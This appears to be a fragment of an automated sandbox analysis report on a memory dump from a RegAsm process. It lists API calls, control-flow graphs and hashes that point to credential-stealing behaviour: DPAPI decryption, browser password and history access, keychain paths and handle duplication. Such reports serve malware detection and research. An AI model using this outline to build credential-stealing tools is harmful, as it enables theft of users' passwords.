                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00418803
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??3@DiskFreeSpace$FullNamePathVersionmalloc
                                                          • String ID:
                                                          • API String ID: 2947809556-0
                                                          • Opcode ID: 940d27dee81e78af7b1dcfc54f007828992184dafba41df18b595ae7ea53f8f2
                                                          • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                          • Opcode Fuzzy Hash: 940d27dee81e78af7b1dcfc54f007828992184dafba41df18b595ae7ea53f8f2
                                                          • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                          APIs
                                                          • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                          • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Library$Load$CryptDataDirectoryFreeSystemUnprotectmemsetwcscatwcscpy
                                                          • String ID:
                                                          • API String ID: 1945712969-0
                                                          • Opcode ID: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
                                                          • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                          • Opcode Fuzzy Hash: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
                                                          • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                          • FindNextFileW.KERNEL32(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: FileFind$FirstNext
                                                          • String ID:
                                                          • API String ID: 1690352074-0
                                                          • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                          • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                          • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                          • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                          APIs
                                                          • memset.MSVCRT ref: 0041898C
                                                          • GetSystemInfo.KERNEL32(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: InfoSystemmemset
                                                          • String ID:
                                                          • API String ID: 3558857096-0
                                                          • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                          • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                          • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                          • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 42 44558e-445594 call 444b06 4->42 43 44557e-445580 call 4136c0 4->43 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 45 445823-445826 14->45 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 52 445879-44587c 18->52 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 87 445685 21->87 88 4456b2-4456b5 call 40b1ab 21->88 30 445605-445607 22->30 31 445603 22->31 28 4459f2-4459fa 23->28 29 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->29 138 44592d-445945 call 40b6ef 24->138 139 44594a 24->139 37 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 28->37 38 445b29-445b32 28->38 157 4459d0-4459e8 call 40b6ef 29->157 158 4459ed 29->158 30->21 41 445609-44560d 30->41 31->30 182 445b08-445b15 call 40ae51 37->182 53 445c7c-445c85 38->53 54 445b38-445b96 memset * 3 38->54 41->21 50 44560f-445641 call 4087b3 call 40a889 call 4454bf 41->50 42->3 66 445585-44558c call 41366b 43->66 55 44584c-445854 call 40b1ab 45->55 56 445828 45->56 154 445665-445670 call 40b1ab 50->154 155 445643-445663 call 40a9b5 call 4087b3 50->155 67 4458a2-4458aa call 40b1ab 52->67 68 44587e 52->68 63 445d1c-445d25 53->63 64 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 53->64 69 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 54->69 70 445b98-445ba0 54->70 55->13 71 44582e-445847 call 40a9b5 call 4087b3 56->71 76 445fae-445fb2 63->76 77 445d2b-445d3b 63->77 159 445cf5 64->159 160 445cfc-445d03 64->160 66->42 67->19 85 445884-44589d call 40a9b5 call 4087b3 68->85 249 445c77 69->249 70->69 86 445ba2-445bcf call 4099c6 call 445403 call 445389 70->86 141 445849 71->141 93 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 77->93 94 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 77->94 146 44589f 85->146 86->53 103 44568b-4456a4 call 40a9b5 call 4087b3 87->103 106 4456ba-4456c4 88->106 165 445d67-445d6c 93->165 166 445d71-445d83 call 445093 93->166 196 445e17 94->196 197 445e1e-445e25 94->197 148 4456a9-4456b0 103->148 120 4457f9 106->120 121 4456ca-4456d3 call 413cfa call 413d4c 106->121 120->6 174 4456d8-4456f7 call 40b2cc call 413fa6 121->174 138->139 139->23 141->55 146->67 148->88 148->103 154->106 155->154 157->158 158->28 159->160 171 445d05-445d13 160->171 172 445d17 160->172 176 445fa1-445fa9 call 40b6ef 165->176 166->76 171->172 172->63 206 4456fd-445796 memset * 4 call 409c70 * 3 174->206 207 4457ea-4457f7 call 413d29 174->207 176->76 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->38 201->182 220 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->220 239 445e62-445e69 202->239 240 445e5b 202->240 219 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->219 206->207 248 445798-4457ca call 40b2cc call 409d1f call 409b98 206->248 207->10 219->76 253 445f9b 219->253 220->182 239->203 245 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 239->245 240->239 264 445f4d-445f5a call 40ae51 245->264 248->207 265 4457cc-4457e5 call 4087b3 248->265 249->53 253->176 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->207 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->219 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                          APIs
                                                          • memset.MSVCRT ref: 004455C2
                                                          • wcsrchr.MSVCRT ref: 004455DA
                                                          • memset.MSVCRT ref: 0044570D
                                                          • memset.MSVCRT ref: 00445725
                                                            • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                            • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                            • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                            • Part of subcall function 0040BDB0: _wcsncoll.MSVCRT ref: 0040BE38
                                                            • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                            • Part of subcall function 0040BDB0: memcpy.MSVCRT ref: 0040BEB2
                                                          • memset.MSVCRT ref: 0044573D
                                                          • memset.MSVCRT ref: 00445755
                                                          • memset.MSVCRT ref: 004458CB
                                                          • memset.MSVCRT ref: 004458E3
                                                          • memset.MSVCRT ref: 0044596E
                                                          • memset.MSVCRT ref: 00445A10
                                                          • memset.MSVCRT ref: 00445A28
                                                          • memset.MSVCRT ref: 00445AC6
                                                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                            • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                            • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                            • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                            • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                                            • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000), ref: 004450F7
                                                          • memset.MSVCRT ref: 00445B52
                                                          • memset.MSVCRT ref: 00445B6A
                                                          • memset.MSVCRT ref: 00445C9B
                                                          • memset.MSVCRT ref: 00445CB3
                                                          • _wcsicmp.MSVCRT ref: 00445D56
                                                          • memset.MSVCRT ref: 00445B82
                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                            • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                            • Part of subcall function 0040B6EF: CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                            • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                            • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                          • memset.MSVCRT ref: 00445986
                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AttributesCloseCreateFolderHandlePathSizeSpecial_wcsicmp_wcslwr_wcsncollmemcpywcscatwcscpy
                                                          • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                          • API String ID: 381723030-3798722523
                                                          • Opcode ID: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
                                                          • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                          • Opcode Fuzzy Hash: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
                                                          • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                            • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                            • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                          • SetErrorMode.KERNEL32(00008001), ref: 00412799
                                                          • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                          • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Library$EnumErrorFreeHandleLoadMessageModeModuleResourceTypes
                                                          • String ID: $/deleteregkey$/savelangfile
                                                          • API String ID: 1442760552-28296030
                                                          • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                          • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                          • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                          • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                                          Control-flow Graph

                                                          APIs
                                                          • memset.MSVCRT ref: 0040B71C
                                                            • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                            • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                          • wcsrchr.MSVCRT ref: 0040B738
                                                          • memset.MSVCRT ref: 0040B756
                                                          • memset.MSVCRT ref: 0040B7F5
                                                          • CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                          • CloseHandle.KERNEL32(00000000), ref: 0040B838
                                                          • memset.MSVCRT ref: 0040B851
                                                          • memset.MSVCRT ref: 0040B8CA
                                                          • memcmp.MSVCRT ref: 0040B9BF
                                                            • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                            • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                          • memset.MSVCRT ref: 0040BB53
                                                          • memcpy.MSVCRT ref: 0040BB66
                                                          • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memset$Freewcsrchr$CloseCreateCryptDataFileHandleLibraryLocalUnprotectmemcmpmemcpywcscpy
                                                          • String ID: chp$v10
                                                          • API String ID: 229402216-2783969131
                                                          • Opcode ID: 0f77db0472bd63cf26258024439ab2a975461d6804070ba6b678b1f2ee2b0392
                                                          • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                          • Opcode Fuzzy Hash: 0f77db0472bd63cf26258024439ab2a975461d6804070ba6b678b1f2ee2b0392
                                                          • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 505 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 508 413f00-413f11 Process32NextW 505->508 509 413da5-413ded OpenProcess 508->509 510 413f17-413f24 CloseHandle 508->510 511 413eb0-413eb5 509->511 512 413df3-413e26 memset call 413f27 509->512 511->508 513 413eb7-413ebd 511->513 519 413e79-413eae call 413959 call 413ca4 CloseHandle 512->519 520 413e28-413e35 512->520 516 413ec8-413eda call 4099f4 513->516 517 413ebf-413ec6 ??3@YAXPAX@Z 513->517 518 413edb-413ee2 516->518 517->518 525 413ee4 518->525 526 413ee7-413efe 518->526 519->511 522 413e61-413e68 520->522 523 413e37-413e44 GetModuleHandleW 520->523 522->519 529 413e6a-413e77 QueryFullProcessImageNameW 522->529 523->522 528 413e46-413e5c 523->528 525->526 526->508 528->522 529->519
                                                          APIs
                                                            • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                                                          • memset.MSVCRT ref: 00413D7F
                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                          • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                          • memset.MSVCRT ref: 00413E07
                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                          • QueryFullProcessImageNameW.KERNEL32(00000000,00000000,?,00000104,00000000,?), ref: 00413E77
                                                          • CloseHandle.KERNEL32(?), ref: 00413EA8
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00413EC1
                                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                          • CloseHandle.KERNEL32(00000000), ref: 00413F1A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Handle$??3@CloseProcessProcess32memset$CreateFirstFullImageModuleNameNextOpenQuerySnapshotToolhelp32
                                                          • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                          • API String ID: 3791284831-1740548384
                                                          • Opcode ID: 49940329a591e45662842b0713840e3f666fa521b7868de24c85cfebece9aff1
                                                          • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                          • Opcode Fuzzy Hash: 49940329a591e45662842b0713840e3f666fa521b7868de24c85cfebece9aff1
                                                          • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                            • Part of subcall function 0040DD85: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                            • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                            • Part of subcall function 0040DD85: CloseHandle.KERNEL32(C0000004), ref: 0040DE3E
                                                            • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                            • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                          • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                          • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                          • DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                                                          • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                            • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                                                            • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                            • Part of subcall function 00409A45: GetTempFileNameW.KERNEL32(?,0040B827,00000000,?), ref: 00409A85
                                                            • Part of subcall function 004096DC: CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                          • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                          • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                          • WriteFile.KERNEL32(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                          • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                          • CloseHandle.KERNEL32(?), ref: 0040E13E
                                                          • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                          • CloseHandle.KERNEL32(?), ref: 0040E148
                                                          • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                          • String ID: bhv
                                                          • API String ID: 4234240956-2689659898
                                                          • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                          • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                          • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                          • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 562 4466f4-44670e call 446904 GetModuleHandleA 565 446710-44671b 562->565 566 44672f-446732 562->566 565->566 567 44671d-446726 565->567 568 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 566->568 570 446747-44674b 567->570 571 446728-44672d 567->571 575 4467ac-4467b7 __setusermatherr 568->575 576 4467b8-44680e call 4468f0 _initterm GetEnvironmentStringsW _initterm 568->576 570->566 574 44674d-44674f 570->574 571->566 573 446734-44673b 571->573 573->566 577 44673d-446745 573->577 578 446755-446758 574->578 575->576 581 446810-446819 576->581 582 44681e-446825 576->582 577->578 578->568 583 4468d8-4468dd call 44693d 581->583 584 446827-446832 582->584 585 44686c-446870 582->585 588 446834-446838 584->588 589 44683a-44683e 584->589 586 446845-44684b 585->586 587 446872-446877 585->587 593 446853-446864 GetStartupInfoW 586->593 594 44684d-446851 586->594 587->585 588->584 588->589 589->586 591 446840-446842 589->591 591->586 595 446866-44686a 593->595 596 446879-44687b 593->596 594->591 594->593 597 44687c-446894 GetModuleHandleA call 41276d 595->597 596->597 600 446896-446897 exit 597->600 601 44689d-4468d6 _cexit 597->601 600->601 601->583
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(00000000,0044E4C0,00000070), ref: 00446703
                                                          • __set_app_type.MSVCRT ref: 00446762
                                                          • __p__fmode.MSVCRT ref: 00446777
                                                          • __p__commode.MSVCRT ref: 00446785
                                                          • __setusermatherr.MSVCRT ref: 004467B1
                                                          • _initterm.MSVCRT ref: 004467C7
                                                          • GetEnvironmentStringsW.KERNEL32(?,?,?,?,0044E494,0044E498), ref: 004467EA
                                                          • _initterm.MSVCRT ref: 004467FD
                                                          • GetStartupInfoW.KERNEL32(?), ref: 0044685A
                                                          • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00446880
                                                          • exit.MSVCRT ref: 00446897
                                                          • _cexit.MSVCRT ref: 0044689D
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: HandleModule_initterm$EnvironmentInfoStartupStrings__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                          • String ID:
                                                          • API String ID: 2791496988-0
                                                          • Opcode ID: ac973ed8bce866ca224172ea4b7a237c44716a7d542afe8b7082d44fa5742df9
                                                          • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                          • Opcode Fuzzy Hash: ac973ed8bce866ca224172ea4b7a237c44716a7d542afe8b7082d44fa5742df9
                                                          • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

                                                          Control-flow Graph

                                                          APIs
                                                          • memset.MSVCRT ref: 0040C298
                                                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                            • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                            • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                          • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                          • wcschr.MSVCRT ref: 0040C324
                                                          • wcschr.MSVCRT ref: 0040C344
                                                          • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                          • GetLastError.KERNEL32 ref: 0040C373
                                                          • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                          • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                                          • String ID: visited:
                                                          • API String ID: 2470578098-1702587658
                                                          • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                          • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                          • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                          • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 628 40e175-40e1a1 call 40695d call 406b90 633 40e1a7-40e1e5 memset 628->633 634 40e299-40e2a8 call 4069a3 628->634 636 40e1e8-40e1fa call 406e8f 633->636 640 40e270-40e27d call 406b53 636->640 641 40e1fc-40e219 call 40dd50 * 2 636->641 640->636 647 40e283-40e286 640->647 641->640 652 40e21b-40e21d 641->652 648 40e291-40e294 call 40aa04 647->648 649 40e288-40e290 ??3@YAXPAX@Z 647->649 648->634 649->648 652->640 653 40e21f-40e235 call 40742e 652->653 653->640 656 40e237-40e242 call 40aae3 653->656 656->640 659 40e244-40e26b _snwprintf call 40a8d0 656->659 659->640
                                                          APIs
                                                            • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                          • memset.MSVCRT ref: 0040E1BD
                                                            • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                                            • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                            • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                            • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                          • _snwprintf.MSVCRT ref: 0040E257
                                                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                            • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                            • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
